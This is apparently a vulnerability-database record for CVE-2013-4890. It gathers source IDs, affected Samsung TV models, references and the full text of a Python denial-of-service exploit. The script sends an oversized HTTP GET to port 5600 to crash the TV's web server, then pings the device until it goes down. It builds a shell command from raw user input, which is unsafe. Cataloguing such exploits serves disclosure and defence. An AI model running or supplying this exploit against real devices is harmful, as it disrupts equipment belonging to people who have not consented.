ID

VAR-E-201307-0008


CVE

cve_id:CVE-2013-4890

Trust: 2.4

sources: BID: 61391 // PACKETSTORM: 122502 // EXPLOIT-DB: 27043 // EDBNET: 48942

EDB ID

27043


TITLE

Samsung PS50C7700 TV - Denial of Service - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 27043

DESCRIPTION

Samsung PS50C7700 TV - Denial of Service. CVE-2013-4890CVE-95574 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 27043

AFFECTED PRODUCTS

vendor:samsungmodel:ps50c7700 tvscope: - version: -

Trust: 1.6

vendor:samsungmodel:tvscope: - version: -

Trust: 0.5

vendor:samsungmodel:ps50c7700 plasma-tvscope:eqversion:0

Trust: 0.3

sources: BID: 61391 // PACKETSTORM: 122502 // EXPLOIT-DB: 27043 // EDBNET: 48942

EXPLOIT

#!/usr/bin/python

# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Date: 07/21/2013
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description: Resets some Samsung TVs
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
# Tested successfully on my Samsung PS50C7700 plasma TV :)

import httplib
import sys
import os

print " ***************************************************************************************"
print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print " Exploit: Denial of Service (DoS) attack\n"
print " Description: Resets some Samsung TVs\n"
print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print " Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print " ***************************************************************************************\n"

# Sends the payload
print " Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# Checks the response
print " Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print " Target down!\n"

Trust: 1.0

sources: EXPLOIT-DB: 27043

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 27043

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 27043

TYPE

Denial of Service

Trust: 1.6

sources: EXPLOIT-DB: 27043 // EDBNET: 48942

TAGS

tag:exploit

Trust: 0.5

tag:web

Trust: 0.5

tag:denial of service

Trust: 0.5

sources: PACKETSTORM: 122502

CREDITS

Malik Mesellem

Trust: 0.6

sources: EXPLOIT-DB: 27043

EXTERNAL IDS

db:NVDid:CVE-2013-4890

Trust: 2.4

db:EXPLOIT-DBid:27043

Trust: 1.6

db:EDBNETid:48942

Trust: 0.6

db:PACKETSTORMid:122502

Trust: 0.5

db:BIDid:61391

Trust: 0.3

sources: BID: 61391 // PACKETSTORM: 122502 // EXPLOIT-DB: 27043 // EDBNET: 48942

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-4890

Trust: 2.1

url:https://www.exploit-db.com/exploits/27043/

Trust: 0.6

url:http://www.samsung.com/nl/consumer/tv-audio-video/televisions/tv-archive/ps50c7000ywxxc

Trust: 0.3

url:http://www.samsung.com/

Trust: 0.3

url:http://www.mmeit.be/exploits/samsungtv_reset.txt

Trust: 0.3

sources: BID: 61391 // PACKETSTORM: 122502 // EXPLOIT-DB: 27043 // EDBNET: 48942

SOURCES

db:BIDid:61391
db:PACKETSTORMid:122502
db:EXPLOIT-DBid:27043
db:EDBNETid:48942

LAST UPDATE DATE

2022-07-27T09:27:33.220000+00:00


SOURCES UPDATE DATE

db:BIDid:61391date:2013-07-21T00:00:00

SOURCES RELEASE DATE

db:BIDid:61391date:2013-07-21T00:00:00
db:PACKETSTORMid:122502date:2013-07-22T19:32:32
db:EXPLOIT-DBid:27043date:2013-07-23T00:00:00
db:EDBNETid:48942date:2013-07-23T00:00:00